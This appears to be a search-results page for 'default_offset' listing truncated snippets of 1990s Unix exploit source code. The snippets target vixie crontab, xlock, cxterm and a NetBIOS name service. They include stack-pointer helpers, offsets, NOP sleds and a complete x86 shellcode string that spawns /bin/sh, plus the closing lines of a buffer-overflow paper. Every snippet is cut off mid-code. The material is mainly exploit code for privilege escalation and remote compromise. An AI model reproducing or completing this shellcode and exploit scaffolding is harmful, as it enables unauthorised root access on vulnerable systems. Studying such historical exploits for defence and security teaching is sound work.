search for: default_offset

...uses vixie crontab. * I didn''t find this, just exploited it. * * * Dave G. * <daveg@escape.com> * http://www.escape.com/~daveg * * */ #include <stdio.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #define DEFAULT_OFFSET -1240 #define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */ #define HAPPY_FILE "./Window" long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { int fd; char *buff = NULL; unsigned long *addr_ptr = NULL;...

...rg 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit <optional_offset> Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb...

...ity pinched from ADMtoolz for get the netbios name -------------------------------------------------------------------------- ------------------------------[ADMnmbname.c]---------------------------------- -------------------------------------------------------------------------- */ #define DEFAULT_OFFSET 3500 #define DEFAULT_BUFFER_SIZE 3081 #define NOP 0x90 #define NMBHDRSIZE 13 #include <stdio.h> #include <stdlib.h> #include <unistd..h> #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/ioctl.h> #in...

...on both Slackware 3.1 and 3.2. Ming Zhang mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp...

...n. You may need to change some default parameters, for instance the number of eat_time processes or eat_desc (the latter if your kernel file table size is greater then 1024 or the limit of file descriptors per process is less than 256 ). If the exploit doesn''t work, you may experiment with DEFAULT_OFFSET in doit.sh Section VIII. Traditional closing unrelated mumbling One simple conclusion from the above musings - no buffer overflow is harmless. As usuall, I encourage any comments ( to be sent to nergal@icm.edu.pl ). I remind you that I''m still an unemployed student, which should be ch...